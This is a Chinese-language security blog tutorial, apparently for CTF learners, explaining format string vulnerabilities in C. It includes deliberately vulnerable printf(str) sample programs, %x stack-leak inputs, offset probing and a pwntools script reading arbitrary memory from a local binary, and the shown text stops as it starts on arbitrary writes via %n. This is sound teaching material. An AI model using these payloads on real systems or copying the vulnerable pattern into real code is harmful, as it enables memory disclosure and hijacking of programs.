<!DOCTYPE html>












  


<html class="theme-next gemini use-motion" lang="en">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2"/>
<meta name="theme-color" content="#222">












<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />






















<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=6.3.0" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=6.3.0">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=6.3.0">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=6.3.0">










<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '/',
    scheme: 'Gemini',
    version: '6.3.0',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":true,"scrollpercent":true,"onmobile":false},
    fancybox: false,
    fastclick: false,
    lazyload: false,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>


  




  <meta name="description" content="格式化字符串真的不是什么新鲜的事物，但现在在一些基础的CTF的PWN题中还是有出现，故打算总结一篇，也当时系统的学习一遍了。  什么是格式化字符串学过c语言的都知道printf，fprintf，sprintf,snprintf等这一类类printf函数中经常会用到“%”后面加一个或多个字符做说明符，例如 12345#include &amp;lt;stdio.h&amp;gt;int main(void)&amp;#12">
<meta name="keywords" content="PWN,格式化字符串">
<meta property="og:type" content="article">
<meta property="og:title" content="格式化字符串漏洞学习">
<meta property="og:url" content="https://veritas501.github.io/2017/04/28/格式化字符串漏洞学习/index.html">
<meta property="og:site_name" content="Veritas501&#39;s Blog">
<meta property="og:description" content="格式化字符串真的不是什么新鲜的事物，但现在在一些基础的CTF的PWN题中还是有出现，故打算总结一篇，也当时系统的学习一遍了。  什么是格式化字符串学过c语言的都知道printf，fprintf，sprintf,snprintf等这一类类printf函数中经常会用到“%”后面加一个或多个字符做说明符，例如 12345#include &amp;lt;stdio.h&amp;gt;int main(void)&amp;#12">
<meta property="og:locale" content="en">
<meta property="og:image" content="http://ordvwjm69.bkt.clouddn.com/fmt_25972122d772639e8366f946e4e2c8f4.png">
<meta property="og:image" content="http://ordvwjm69.bkt.clouddn.com/fmt_c29273e995e8aaa2c9cc4ae15abd779b.png">
<meta property="og:image" content="http://ordvwjm69.bkt.clouddn.com/fmt_c46b7c13523766ac5bc9c78599d3aba4.png">
<meta property="og:image" content="http://ordvwjm69.bkt.clouddn.com/fmt_eaebe9ee0e63783ba190b6af20da7f03.png">
<meta property="og:image" content="http://ordvwjm69.bkt.clouddn.com/fmt_d928423855be1ec06fca199ca7e9ba9a.png">
<meta property="og:updated_time" content="2017-08-25T06:17:45.408Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="格式化字符串漏洞学习">
<meta name="twitter:description" content="格式化字符串真的不是什么新鲜的事物，但现在在一些基础的CTF的PWN题中还是有出现，故打算总结一篇，也当时系统的学习一遍了。  什么是格式化字符串学过c语言的都知道printf，fprintf，sprintf,snprintf等这一类类printf函数中经常会用到“%”后面加一个或多个字符做说明符，例如 12345#include &amp;lt;stdio.h&amp;gt;int main(void)&amp;#12">
<meta name="twitter:image" content="http://ordvwjm69.bkt.clouddn.com/fmt_25972122d772639e8366f946e4e2c8f4.png">






  <link rel="canonical" href="https://veritas501.github.io/2017/04/28/格式化字符串漏洞学习/"/>



<script type="text/javascript" id="page.configurations">
  CONFIG.page = {
    sidebar: "",
  };
</script>

  <title>格式化字符串漏洞学习 | Veritas501's Blog</title>
  









  <noscript>
  <style type="text/css">
    .use-motion .motion-element,
    .use-motion .brand,
    .use-motion .menu-item,
    .sidebar-inner,
    .use-motion .post-block,
    .use-motion .pagination,
    .use-motion .comments,
    .use-motion .post-header,
    .use-motion .post-body,
    .use-motion .collection-title { opacity: initial; }

    .use-motion .logo,
    .use-motion .site-title,
    .use-motion .site-subtitle {
      opacity: initial;
      top: initial;
    }

    .use-motion {
      .logo-line-before i { left: initial; }
      .logo-line-after i { right: initial; }
    }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" lang="en">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Veritas501's Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
    
  </div>

  <div class="site-nav-toggle">
    <button aria-label="Toggle navigation bar">
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>



<nav class="site-nav">
  
    <ul id="menu" class="menu">
      
        
        
        
          
          <li class="menu-item menu-item-home">
    <a href="/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-home"></i> <br />Home</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-about">
    <a href="/about/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-user"></i> <br />About</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-archives">
    <a href="/archives/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />Archives</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-tags">
    <a href="/tags/" rel="section">
      <i class="menu-item-icon fa fa-fw fa-tags"></i> <br />Tags</a>
  </li>
        
        
        
          
          <li class="menu-item menu-item-guestbook">
    <a href="/Guestbook" rel="section">
      <i class="menu-item-icon fa fa-fw fa-pencil"></i> <br />Guestbook</a>
  </li>

      
      
    </ul>
  

  

  
</nav>



  



</div>
    </header>

    


    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          
            

          
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://veritas501.github.io/2017/04/28/格式化字符串漏洞学习/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="Veritas501">
      <meta itemprop="description" content="开始踏上Re&Pwn之路...">
      <meta itemprop="image" content="/images/215.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Veritas501's Blog">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">格式化字符串漏洞学习
              
            
          </h1>
        

        <div class="post-meta">
          <span class="post-time">

            
            
            

            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              

              
                
              

              <time title="Created: 2017-04-28 00:00:00" itemprop="dateCreated datePublished" datetime="2017-04-28T00:00:00+08:00">2017-04-28</time>
            

            
              

              
                
                <span class="post-meta-divider">|</span>
                

                <span class="post-meta-item-icon">
                  <i class="fa fa-calendar-check-o"></i>
                </span>
                
                  <span class="post-meta-item-text">Edited on</span>
                
                <time title="Modified: 2017-08-25 14:17:45" itemprop="dateModified" datetime="2017-08-25T14:17:45+08:00">2017-08-25</time>
              
            
          </span>

          

          
            
              <span class="post-comments-count">
                <span class="post-meta-divider">|</span>
                <span class="post-meta-item-icon">
                  <i class="fa fa-comment-o"></i>
                </span>
                <a href="/2017/04/28/格式化字符串漏洞学习/#comments" itemprop="discussionUrl">
                  <span class="post-meta-item-text">Comments: </span> <span class="post-comments-count valine-comment-count" data-xid="/2017/04/28/格式化字符串漏洞学习/" itemprop="commentCount"></span>
                </a>
              </span>
            
          

          
          
             <span id="/2017/04/28/格式化字符串漏洞学习/" class="leancloud_visitors" data-flag-title="格式化字符串漏洞学习">
               <span class="post-meta-divider">|</span>
               <span class="post-meta-item-icon">
                 <i class="fa fa-eye"></i>
               </span>
               
                 <span class="post-meta-item-text">Views: </span>
               
                 <span class="leancloud-visitors-count"></span>
             </span>
          

          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <p>格式化字符串真的不是什么新鲜的事物，但现在在一些基础的CTF的PWN题中还是有出现，故打算总结一篇，也当时系统的学习一遍了。</p>
<hr>
<h2 id="什么是格式化字符串"><a href="#什么是格式化字符串" class="headerlink" title="什么是格式化字符串"></a>什么是格式化字符串</h2><p>学过c语言的都知道printf，fprintf，sprintf,snprintf等这一类类printf函数中经常会用到“%”后面加一个或多个字符做说明符，例如</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">void</span>)</span></span>&#123;</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">"My name is %s"</span>,<span class="string">"xiaoming"</span>);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>调用以后会显示：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">My name is xiaoming</span><br></pre></td></tr></table></figure>
<p>该printf函数的第一个参数就是格式化字符串，它主要是依靠一个用来告诉程序如何进行格式化输出的说明符。在C程序中我们有许多用来格式化字符串的说明符，在这些说明符后面我们可以填充我们的内容。记住，说明符的前缀总是“%”字符，另外说明符存在许多不同的数据类型，最常见的包括：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">%d - 十进制 - 输出十进制整数</span><br><span class="line">%s - 字符串 - 从内存中读取字符串</span><br><span class="line">%x - 十六进制 - 输出十六进制数</span><br><span class="line">%c - 字符 - 输出字符</span><br><span class="line">%p - 指针 - 指针地址</span><br><span class="line">%n - 到目前为止所写的字符数</span><br></pre></td></tr></table></figure>
<p>在这众多的格式符中出了一个叛徒<code>%n</code>，其他都是用来打印的，而<code>%n</code>可以用来把一个int型的值写到指定的地址中。关于这个格式符的利用在后面再介绍，这里先简单给两个例子。</p>
<p>在gcc环境下，我们编写如下代码：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//gcc str.c -m32 -o str</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">int</span> c = <span class="number">0</span>; </span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">"the use of %n"</span>, &amp;c);</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">"%d\n"</span>, c);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>输出为<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">the use of 11</span><br></pre></td></tr></table></figure></p>
<p>在VS上直接用以上代码编译后运行则会出错，原因是微软处于安全考虑默认是禁用了<code>%n</code>，要启用则需要加上：<br><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">_set_printf_count_output(<span class="number">1</span>);</span><br></pre></td></tr></table></figure></p>
<p>具体细节可以参考MSDN：<a href="https://msdn.microsoft.com/zh-cn/library/ms175782.aspx" target="_blank" rel="noopener">https://msdn.microsoft.com/zh-cn/library/ms175782.aspx</a></p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">int</span> c = <span class="number">0</span>;</span><br><span class="line">	_set_printf_count_output(<span class="number">1</span>);</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">"the use of %n"</span>, &amp;c);</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">"%d"</span>, c);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<hr>
<p>我们再看一下再栈中的运行细节。</p>
<p>示例程序：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">int</span> a = <span class="number">0x3000</span>;</span><br><span class="line">	<span class="keyword">char</span> b[<span class="number">10</span>] = <span class="string">"hahaha"</span>;</span><br><span class="line">	<span class="keyword">int</span> c = <span class="number">0xFF</span>;</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">"output %d,%s,%d"</span>,a,b,c);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>汇编代码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">0040150E    C74424 2C 00300&gt;mov dword ptr ss:[esp+0x2C],0x3000</span><br><span class="line">00401516    C74424 1E 68616&gt;mov dword ptr ss:[esp+0x1E],0x61686168</span><br><span class="line">0040151E    C74424 22 68610&gt;mov dword ptr ss:[esp+0x22],0x6168</span><br><span class="line">00401526    66:C74424 26 00&gt;mov word ptr ss:[esp+0x26],0x0</span><br><span class="line">0040152D    C74424 28 FF000&gt;mov dword ptr ss:[esp+0x28],0xFF</span><br><span class="line">00401535    8B4424 28       mov eax,dword ptr ss:[esp+0x28]          ; eax = 0xFF</span><br><span class="line">00401539    894424 0C       mov dword ptr ss:[esp+0xC],eax           ; [0xc] = 0xFF</span><br><span class="line">0040153D    8D4424 1E       lea eax,dword ptr ss:[esp+0x1E]          ; eax = &amp;str_of_hahaha</span><br><span class="line">00401541    894424 08       mov dword ptr ss:[esp+0x8],eax           ; [0x8] = &amp;str_of_hahaha</span><br><span class="line">00401545    8B4424 2C       mov eax,dword ptr ss:[esp+0x2C]          ; eax = 0x3000</span><br><span class="line">00401549    894424 04       mov dword ptr ss:[esp+0x4],eax           ; [0x4] = eax</span><br><span class="line">0040154D    C70424 00404000 mov dword ptr ss:[esp],study.00404000    ; output %d,%s,%d</span><br><span class="line">00401554    E8 CF100000     call &lt;jmp.&amp;msvcrt.printf&gt;</span><br></pre></td></tr></table></figure>
<p>栈状态：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">0060FE80   00404000  |format = &quot;output %d,%s,%d&quot;</span><br><span class="line">0060FE84   00003000  |&lt;%d&gt; = 3000 (12288.)</span><br><span class="line">0060FE88   0060FE9E  |&lt;%s&gt; = &quot;hahaha&quot;</span><br><span class="line">0060FE8C   000000FF  \&lt;%d&gt; = FF (255.)</span><br></pre></td></tr></table></figure>
<p>上面是内存低址，下面是内存高址，函数的参数的入栈顺序（此处）为从右到左（__cdecl 调用约定）</p>
<hr>
<h2 id="漏洞原理"><a href="#漏洞原理" class="headerlink" title="漏洞原理"></a>漏洞原理</h2><p>产生这个漏洞的原因只有一个，那就是程序员偷懒。</p>
<p>比如我想让用户输入一个名字，然后再把这个名字原样输出，一般人可能会这么写</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">char</span> str[<span class="number">100</span>];</span><br><span class="line"><span class="built_in">scanf</span>(<span class="string">"%s"</span>,str);</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">"%s"</span>,str);</span><br></pre></td></tr></table></figure>
<p>这个程序没有问题。<br>但总会有一些人为了偷懒会写成这种样子</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">char str[100];</span><br><span class="line">scanf(&quot;%s&quot;,str);</span><br><span class="line">printf(str);</span><br></pre></td></tr></table></figure>
<p>这个程序在printf处用了一种偷懒的写法。这看起来是没有什么问题，程序也正常的打印了名字，但是却产生了一个非常严重的漏洞。</p>
<p>一般来说，每个函数的参数个数都是固定的，被调用的函数知道应该从内存中读取多少个变量，但printf是可变参数的函数，对可变参数的函数而言，一切就变得模糊了起来。函数的调用者可以自由的指定函数参数的数量和类型，被调用者无法知道在函数调用之前到底有多少参数被压入栈帧当中。所以printf函数要求传入一个format参数用以指定到底有多少，怎么样的参数被传入其中。然后它就会忠实的按照函数的调用者传入的格式一个一个的打印出数据。由于编程者的疏忽，把格式化字符串的操纵权交给用户，就会产生后面任意地址读写的漏洞。</p>
<p>示例程序：</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">char</span> a[<span class="number">100</span>];</span><br><span class="line">	<span class="built_in">scanf</span>(<span class="string">"%s"</span>,a);</span><br><span class="line">	<span class="built_in">printf</span>(a);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>假设我们的输入为:<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">AAAA%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x</span><br></pre></td></tr></table></figure></p>
<p>程序的输出为（此次）：<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">AAAA61fe4c,61ffcc,76e4d250,70734fbf,fffffffe,76e473da,41414141,252c7825,78252c78,2c78252c,252c7825</span><br></pre></td></tr></table></figure></p>
<p>注意，这其中有一组为41414141，那就是这个字符串开始的位置。</p>
<p>看一下栈里的样子：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">0061FE30   0061FE4C  |format = &quot;AAAA%x,%x,%x,%x,%x,%x,%x,%x,%x,%x,%x&quot;</span><br><span class="line">0061FE34   0061FE4C  |&lt;%x&gt; = 0x61FE4C</span><br><span class="line">0061FE38   0061FFCC  |&lt;%x&gt; = 0x61FFCC</span><br><span class="line">0061FE3C   76E4D250  |&lt;%x&gt; = 0x76E4D250</span><br><span class="line">0061FE40   FF12BE58  |&lt;%x&gt; = 0xFF12BE58</span><br><span class="line">0061FE44   FFFFFFFE  |&lt;%x&gt; = 0xFFFFFFFE</span><br><span class="line">0061FE48   76E473DA  |&lt;%x&gt; = 0x76E473DA</span><br><span class="line">0061FE4C   41414141  |&lt;%x&gt; = 0x41414141</span><br><span class="line">0061FE50   252C7825  |&lt;%x&gt; = 0x252C7825</span><br><span class="line">0061FE54   78252C78  |&lt;%x&gt; = 0x78252C78</span><br><span class="line">0061FE58   2C78252C  |&lt;%x&gt; = 0x2C78252C</span><br><span class="line">0061FE5C   252C7825  \&lt;%x&gt; = 0x252C7825</span><br><span class="line">0061FE60   78252C78</span><br><span class="line">0061FE64   2C78252C</span><br><span class="line">0061FE68   252C7825</span><br><span class="line">0061FE6C   78252C78</span><br><span class="line">0061FE70   00000000</span><br><span class="line">0061FE74   00000000</span><br><span class="line">0061FE78   00000000</span><br></pre></td></tr></table></figure>
<p>0x0061FE4C  是格式化字符串开始的位置，通过不断的取变量操作，最终我们就能读取到程序的每一个位置。</p>
<hr>
<h2 id="实现任意地址读"><a href="#实现任意地址读" class="headerlink" title="实现任意地址读"></a>实现任意地址读</h2><p>有了上面的原理，我们来到linux环境。</p>
<p>任意地址读我们需要用到printf格式化字符串的另外一个特性，”$“操作符。</p>
<p>这个操作符可以输出指定位置的参数。<br>wikipedia是这样说的：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">Parameter field</span><br><span class="line">This is a POSIX extension and not in C99. The Parameter field can be omitted or can be:</span><br><span class="line"></span><br><span class="line">n$	</span><br><span class="line"></span><br><span class="line">n is the number of the parameter to display using this format specifier, allowing the parameters provided to be output multiple times, using varying format specifiers or in different orders. If any single placeholder specifies a parameter, all the rest of the placeholders MUST also specify a parameter.</span><br><span class="line"></span><br><span class="line">For example, printf(&quot;%2$d %2$#x; %1$d %1$#x&quot;,16,17) produces 17 0x11; 16 0x10.</span><br></pre></td></tr></table></figure>
<p>示例程序：<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#include &lt;stdio.h&gt;</span></span><br><span class="line"></span><br><span class="line">int main(void)</span><br><span class="line">&#123;</span><br><span class="line">	char str[<span class="number">100</span>];</span><br><span class="line">	scanf(<span class="string">"%s"</span>,str);</span><br><span class="line">	printf(str);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>首先测出字符串开头的偏移量：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">veritas@ubuntu:~/pwn$ ./str</span><br><span class="line">AAAA%1$x</span><br><span class="line">AAAAffa87a68</span><br><span class="line">veritas@ubuntu:~/pwn$ ./str</span><br><span class="line">AAAA%2$x        </span><br><span class="line">AAAAc2</span><br><span class="line">veritas@ubuntu:~/pwn$ ./str</span><br><span class="line">AAAA%3$x</span><br><span class="line">AAAAf766376b</span><br><span class="line">veritas@ubuntu:~/pwn$ ./str</span><br><span class="line">AAAA%4$x</span><br><span class="line">AAAAffb6ad4e</span><br><span class="line">veritas@ubuntu:~/pwn$ ./str</span><br><span class="line">AAAA%5$x</span><br><span class="line">AAAAffab456c</span><br><span class="line">veritas@ubuntu:~/pwn$ ./str</span><br><span class="line">AAAA%6$x    </span><br><span class="line">AAAA41414141</span><br></pre></td></tr></table></figure>
<p>由此我们测出偏移为6</p>
<p>然后我们用pwntools编写如下脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">'debug'</span></span><br><span class="line"></span><br><span class="line">cn = process(<span class="string">'str'</span>)</span><br><span class="line">cn.sendline(p32(<span class="number">0x08048000</span>)+<span class="string">"%6$s"</span>)</span><br><span class="line"><span class="comment">#cn.sendline("%7$s"+p32(0x08048000))</span></span><br><span class="line"><span class="keyword">print</span> cn.recv()</span><br></pre></td></tr></table></figure>
<p>执行脚本以后发现 EOFError</p>
<p><img src="http://ordvwjm69.bkt.clouddn.com/fmt_25972122d772639e8366f946e4e2c8f4.png" alt=""></p>
<p>因为我们想要读取的地址是0x08048000，根据little-endian，所以我们发送过去的数据包的第一字节是地址的最后一字节，即0x00，所以发送失败。我们可以对payload做如下调整</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cn.sendline(<span class="string">"%7$s"</span>+p32(<span class="number">0x08048000</span>))</span><br></pre></td></tr></table></figure>
<p>把6改成7是有原因的，调整前：</p>
<p><img src="http://ordvwjm69.bkt.clouddn.com/fmt_c29273e995e8aaa2c9cc4ae15abd779b.png" alt=""></p>
<p>调整后：</p>
<p><img src="http://ordvwjm69.bkt.clouddn.com/fmt_c46b7c13523766ac5bc9c78599d3aba4.png" alt=""></p>
<p>通过改进的payload我们成功获取到了elf文件的前几字节。</p>
<p><img src="http://ordvwjm69.bkt.clouddn.com/fmt_eaebe9ee0e63783ba190b6af20da7f03.png" alt=""></p>
<p><img src="http://ordvwjm69.bkt.clouddn.com/fmt_d928423855be1ec06fca199ca7e9ba9a.png" alt=""></p>
<p>如果这个程序中含有其他漏洞能够是我们控制eip来反复调用printf函数，把整个elf或是libc拖下来都是可以做到的。</p>
<hr>
<h2 id="实现任意地址写"><a href="#实现任意地址写" class="headerlink" title="实现任意地址写"></a>实现任意地址写</h2><p>看了任意地址写，肯定感觉不过瘾，毕竟这样我们是能看，不能写入一些非法数据来控制eip。下面就来介绍任意地址写，用到的就是我们上面提到的<code>%n</code>格式符。</p>
<figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//gcc str.c -m32 -o str</span></span><br><span class="line"><span class="meta">#<span class="meta-keyword">include</span> <span class="meta-string">&lt;stdio.h&gt;</span></span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">(<span class="keyword">void</span>)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">	<span class="keyword">int</span> c = <span class="number">0</span>; </span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">"the use of %n"</span>, &amp;c);</span><br><span class="line">	<span class="built_in">printf</span>(<span class="string">"%d\n"</span>, c);</span><br><span class="line">	<span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这个程序，我们把n的值改成11。但作为代价，我们输入了长达11的字符串，如果我们想把n改成100，不总是有这么长的空间让我们存100字节的数据。</p>
<p>这时我们需要用到格式符的另一点特性，自定义打印字符串的宽度，程序如下</p>
